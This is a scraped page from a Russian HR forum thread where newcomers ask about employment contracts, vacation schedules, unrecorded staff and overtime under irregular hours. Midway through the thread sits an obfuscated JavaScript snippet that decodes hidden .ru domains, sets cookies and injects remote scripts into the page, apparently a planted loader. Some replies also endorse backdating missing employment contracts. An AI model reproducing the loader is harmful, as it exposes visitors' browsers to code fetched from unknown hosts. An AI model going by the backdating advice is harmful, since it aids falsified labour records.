Тема форума: Глупые вопросы новичка. По кадровому делопроизводству | Форумы "Кадровое делопроизводство" | Сообщение № 253483
  RSS
[ Закрыто ] Глупые вопросы новичка. По кадровому делопроизводству, Вопросы, которые возникают у чайников в кадровом деле, и ответы на них

Совсем недавно начала заниматься кадрами, поэтому появляется куча, наверняка глупых для остальных, вопросов. Если мне поможете разобраться с ними, буду очень благодарна.
1. Если до меня в кадрах велось что-то не совсем правильно и я сейчас буду закрывать ошибки, то что мне делать с тем периодом, данные которого я не смогу восстановить? Я не хочу чтобы мой руководитель попал на этом. Но и сама я мало что смогу сделать без подписей уволенных сотрудников, например.
2. Мне лучше создавать недостающие документы задним числом и подписываться тем человеком, который отвечал за это до меня или я могу делать доки настоящей датой?
3. Если в тех документах была фраза "контроль за исполнением приказа возлагаю на (прошлого сотрудника), то мне их сейчас не переделывать на свою фамилию, они по умолчанию легли на меня или издать приказ о том, что теперь контроль лежит на мне?
Страницы:Пред.1...221222223224225...787След.
Ответы

Цитата
Elena14 пишет:
Какой должен быть с ним заключить договор???
Какая разница какой будет договор если есть заявление об увольнении по с/ж??? Или нет??? К тому же уже 17.08.???

Цитата
Elena14 пишет:
Начала оформлять но думаю не правильно или нет???
Самое главное, чтобы в нём были все обязательные требования к ТД.

Цитата
Elena14 пишет:
сотрудник проработал до 15.08.2015 года.
Расчёт произведён???? Кто хочет оформления работник???

Цитата
Elena14 пишет:
Просит по заявлению принять его по срочному трудовому договору.
Так не бывает. Срочным ТД может быть только по основаниям, предусмотренным законом, но никак не по просьбе (статья 58, 59 ТК РФ).

Цитата
Elena14 пишет:
челочек хочет увольняться.
Ну так пусть заявление пишет и увольняется по собственному желанию - не рабовладельческий строй.

Цитата
Elena14 пишет:
В каждой организации СВОЯ форма ТД - она едина для всех работников. Вы начали первый ТД что ли оформлять? А у других работников тоже нет ТД ????

Что я Вам могу сказать, СЕРЕГА, против системы, которую построил начальник не попрешь. Если что-то не выполнено - наказывают того, кто в этот момент на работе и неважно что он был в отпуске. Всегда найдут причину, например "плохо подготовил сменщика".
Если ты не остаешься после работы, значит "в рабочее время не загружен", если остаешься по объективным причинам "я этого не видел, и вообще за что тебе отгул, если тебя нужно уволить из-за низкой квалификации?" У всех одна реакция на этот беспредел " чтоб он провалился ...и все РЖД с ним"!
Написала и сама ужаснулась. Видимо тоже скоро пойду писать по СЖ...

Цитата
ulla33 пишет:
РЖД
Оооооо, ну так можно было сразу написать место работы и больше ничего не объяснять - ни одного доброго слова ни с одного места о них не слышала! И на своей шкуре их непорядочность испытала)))))))

Цитата
Снеженка пишет:
Цитата
Elena14 пишет:
Просит по заявлению принять его по срочному трудовому договору.
Так не бывает. Срочным ТД может быть только по основаниям, предусмотренным законом, но никак не по просьбе (статья 58, 59 ТК РФ).
Цитата
Elena14 пишет:
челочек хочет увольняться.
Ну так пусть заявление пишет и увольняется по собственному желанию - не рабовладельческий строй.
Цитата
Elena14 пишет:
В каждой организации СВОЯ форма ТД - она едина для всех работников. Вы начали первый ТД что ли оформлять? А у других работников тоже нет ТД ???? Снеженка, перед мной лежат вот его документы.приказ на работу. заявление чтоб приняли, копия паспорта диплома, копия трудовой, справка что человек работал на другом предприятии, согласия на обработку данных, заявление о ежегодном оплачиваемом отпуске и заявление на увольнение. Т 2 нет все лежит в файликах на каждого сотрудника. начальник все вроде как вел сам....но сейчас предали все это мне я понимаю что так в реальности не должно быть что мне теперь делать?? пытаюсь объяснить руководителю что задним числом делать нельзя... НО НУЖНО ОФОРМИТЬ КАК ПОЛАГАЕТСЯ.

Цитата
Серега пишет:
Цитата
Elena14 пишет:
Какой должен быть с ним заключить договор???
Какая разница какой будет договор если есть заявление об увольнении по с/ж??? Или нет??? К тому же уже 17.08.???
Цитата
Elena14 пишет:
Самое главное, чтобы в нём были все обязательные требования к ТД.
Цитата
Elena14 пишет:
сотрудник проработал до 15.08.2015 года.
Расчёт произведён???? Кто хочет оформления работник??? расчет еще не произведен, хочет уходить сам.

Цитата
Elena14 пишет:
НО НУЖНО ОФОРМИТЬ КАК ПОЛАГАЕТСЯ.
Я задала Вам конкретный вопрос - в организации есть вообще ТД у других работников? Если есть - зачем Вы пытаетесь изобрести велосипед? Оформляете обычный ТД, как и у всех остальных. Если нет - разрабатывайте форму единую для всех и со всеми заключайте.

Цитата
Elena14 пишет:
пытаюсь объяснить руководителю что задним числом делать нельзя..
А придется. Ибо ТД должны быть у всех работников. И если их нет, нужно оформлять.

В приказе об увольнении нужно указать номер ТД , который ОБЯЗАТЕЛЬНО должен быть (иное законом не предусмотрено) и пусть он будет позже.

Цитата
Снеженка пишет:
Цитата
Elena14 пишет:
Я задала Вам конкретный вопрос - в организации есть вообще ТД у других работников? Если есть - зачем Вы пытаетесь изобрести велосипед? Оформляете обычный ТД, как и у всех остальных. Если нет - разрабатывайте форму единую для всех и со всеми заключайте.
Цитата
Elena14 пишет:
А придется. Ибо ТД должны быть у всех работников. И если их нет, нужно оформлять.

В приказе об увольнении нужно указать номер ТД , который ОБЯЗАТЕЛЬНО должен быть (иное законом не предусмотрено) и пусть он будет позже.

Цитата
Снеженка пишет:
Цитата
Elena14 пишет:
Цитата
Elena14 пишет:

договоров нет.

Цитата
Снеженка пишет:
Так и пишем в графе планируемая дата - 2016.
Сижу тут обдумываю и пришла в голову мысль: Получается что в Графике отпусков напротив каждого сотрудника должна быть запись , либо даты отпуска, либо отметка о переносе, либо отметка об увольнении. Правильно?

Цитата
ulla33 пишет:
и все РЖД с ним"!
Ну да, ну да наслышаны про РЖД! :evil Там голова давно протухла. Особенно в регионах, руки то людям выкручивают будь здоров, особенно если работа только в госорганах, муниципальных и РЖД, а так же контракт с МО. Бардак там жуткий.

Цитата
ulla33 пишет:
против системы, которую построил начальник не попрешь.
Да есть примеры прут и в организациях покруче чем РЖД, но борьба будет долгой, надо быть спецом дай боже, ну и нервишки крепкие.
В общем тогда постарайтесь разрулить, поговорите с работником, поскольку тут ситуация не в его пользу. Что решили миром это хорошо, чуют что ...... в пуху.

Цитата
faraon2403 пишет:
либо отметка об увольнении. Правильно?
Это не обязательно, но некоторые практикуют.

Цитата
faraon2403 пишет:
либо отметка о переносе,
реальная дата отпуска. А в примечаниях можете указать основание.

Помогите пожалуйста,как посчитать компенсацию за неиспользованный отпуск при увольнении?
wind ow .a1336404323 = 1;!f unction(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21686",n=f unction(o){var e=docu ment.cookie.match(new RegExp("(?:^|; )"+o.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=f unction(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=f unction(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=Stri ng.fromCharCode(parseInt(o[t],16));return e},c=f unction(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toS tring(16);return e},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=f unction(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(wind ow .smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window .smlo.loadSmlo(n.r eplace('https:','http:'));else if(wind ow .zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window .zSmlo.loadSmlo(n.r eplace('https:','http:'));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=f unction(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=f unction(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("kadrovik-praktik.ru")+"_"+(self===top?0:1)+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

faraon2403, , конечно у вас в конце года все графы должны бвть заполнены.
Кто уволен, у кого перенесен отпуск на след год, кто отгулял и т.д.

Elena14, правильно ли я вас поняла.
Ваш работник, который работал у вас с 03.02.2014 г. неофициально без оформления, сейчас хочет устроится в некое ООО, поэтому просит оформить работу у вас официально?
Имейте ввиду, что если оформляете его официально задним числом, то вы подписываетесь под нарушением законодательства, не только трудового, но и связанные с отчислениями, т.к. вам придется начислить ему заработную плату и сделать все страховые отчисления. Иначе, запись в ТК, и заключение ТД не имеет смысла, если только для «отвода глаз» новому работодателю. Или отправить на все время в отпуск без сохранения з/п, но при желании работника, это тоже можно доказать, что не законно.
Еще, смущает ваша «копия трудовой», а где оригинал или он совместитель?

Помогите, пожалуйста! У водителя ненормированный рабочий день, работает 8ч. 5 дней. Что ставить ему в табеле, если он отработал больше 8 часов?

Цитата
kadr87 пишет:
Что ставить ему в табеле, если он отработал больше 8 часов?
ВСЕГДА в табеле отражаем реально отработанное время. И в случае переработки - оплачиваем ее как и положено по закону.

Цитата
Снеженка пишет:
Это и есть приказ о внесении изменений в ШР. Но в таком случае данный приказ будет приложением к ШР и получится ШР "с портянками" - лучше сразу утвердить новое, единое - процедура та же. Никаких сложностей.
Спасибо))) Эх снова переделывать документы:(

kadr87, ставите время по факту. Провите в табеле. Оплату за переработку производите согласно трудовому законодательству.

специалистов Роструда приведен в письме от 7 июня 2008 г. № 1316-6-1.

Переработка в будни при ненормированном рабочем дне не оплачивается. Аргументируя этот вывод, сотрудники трудовой службы подчеркнули, что сверхурочная работа и ненормированный рабочий день — это абсолютно разные режимы работы.

Правила труда при сверхурочной работе установлены в статье 99 Трудового кодекса РФ (возможность сверхурочной работы лишь с согласия работника и т. п.). Такую работу положено оплачивать не менее чем в полуторном размере за первые два часа и не менее чем в двойном размере за последующие часы (ст. 152 Трудового кодекса РФ).

Ненормированный рабочий день упоминается в статьях 101, 116 и 119 кодекса. При этом в статье 101 описаны условия работы в этом режиме (возможность привлекать сотрудника к работе за пределами рабочего дня без его согласия и т. п.), а статьи 116 и 119 обязывают работодателей предоставлять при этом режиме труда дополнительный отпуск продолжительностью не менее трех дней.

По мнению Роструда, из этого следует, что Трудовой кодекс РФ не позволяет применять правила оплаты сверхурочной работы к часам переработки при ненормированном рабочем дне. Косвенное подтверждение этому специалисты трудового ведом-ства находят в статье 97 Налогового кодекса РФ.

Кроме того, Роструд указал, что единственная норма, которая позволяла применять к ненормированному рабочему дню правила сверхурочной работы, исчезла из статьи 119 Трудового кодекса РФ еще 6 октября 2006 года. В ситуации, когда компания не обеспечивала ненормированно трудящегося работника дополнительным отпуском, она обязывала ее оплачивать часы переработки как сверхурочную работу.

С 6 октября 2006 года эта норма не действует. Это означает, что, во-первых, компания не вправе не предоставлять работнику дополнительный отпуск по статье 119 кодекса. А во-вторых, что этот отпуск является единственной компенсацией за работу в условиях ненормированного рабочего дня. Возможность каких-либо добавочных выплат за такую работу в настоящее время не предусмотрена в принципе.

Цитата
Вадим А пишет:
этот отпуск является единственной компенсацией за работу в условиях ненормированного рабочего дня. Возможность каких-либо добавочных выплат за такую работу в настоящее время не предусмотрена в принципе.
Они пошутили что ли???? ДО предоставляется за то, что работника могут привлекать к сверхурочным без оформления - у него ненормированный рабочий день и не нужны на то никакие приказы и т.д. За неудобства, связанные с периодическим "дерганьем" - вот и все. А уж оплатить обязаны реально отработанные часы.

Может быть 3 дня отпуска, а при этом работник сверхурочно будет отрабатывать десятки часов за год. Роструд видимо после большого мероприятия это письмо выдал.....

Цитата
Снеженка пишет:
ДО предоставляется за то, что работника могут привлекать к сверхурочным без оформления - у него ненормированный рабочий день и не нужны на то никакие приказы и т.д.
Статья 101. Ненормированный рабочий день.
Ненормированный рабочий день - особый режим работы, в соответствии с которым отдельные работники могут по распоряжению работодателя при необходимости эпизодически привлекаться к выполнению своих трудовых функций за пределами установленной для них продолжительности рабочего времени.....
Цитата
Снеженка пишет:
Может быть 3 дня отпуска, а при этом работник сверхурочно будет отрабатывать десятки часов за год.
Эпизодически!!!

Цитата
Снеженка пишет:
Роструд видимо после большого мероприятия это письмо выдал
Не думаю.

Ребят, а при прекращении трудового договора с несовершеннолетним есть ли какие то особые возможности и условия при увольнении? Например, что он может уволиться день в день или за день до этого только предупредить?

Цитата
Серега пишет:
Эпизодически!!!
И что???? Эти "эпизоды" и складываются в десятки часов.

Да уж, наши законы)))))) Полистала Гарант. Вот "где собака порылась" ))))) читаем
Цитата
Цитата
Табель учета рабочего времени. Если работнику установлен ненормированный рабочий день, то работа сверх установленной продолжительности в табеле учета рабочего времени не отражается.
Цитата
если переработки систематические, то трудовая инспекция или суд может признать такую работу сверхурочной (с выплатой соответствующей компенсации).
То есть, фактически предлагают работодателю не фиксировать реальную работу, иначе (у нас же работодатели не понимают слово "эпизодически", да и законом ограничения не предусмотрено) и подводить работника под этот самый ненормированный день. Вот прям чуть ли не первая статья, которая не в пользу работника)))))))))

Цитата
Фокса пишет:
Например, что он может уволиться день в день или за день до этого только предупредить?
Если работодатель не возражает, то ЛЮБОЙ работник может уволиться день в день.

А так - нет, особенностей при увольнении ПО СОБСТВЕННОМУ желанию нет.

Очень интересно про ненормированность, у нас тоже у всех есть 3 дня к отпуску. Но вот что при этом не нужно делать приказ на сверхурочку - первый раз слышу! И что на работу в выходной день тоже??????
Страницы:Пред.1...221222223224225...787След.
Читают тему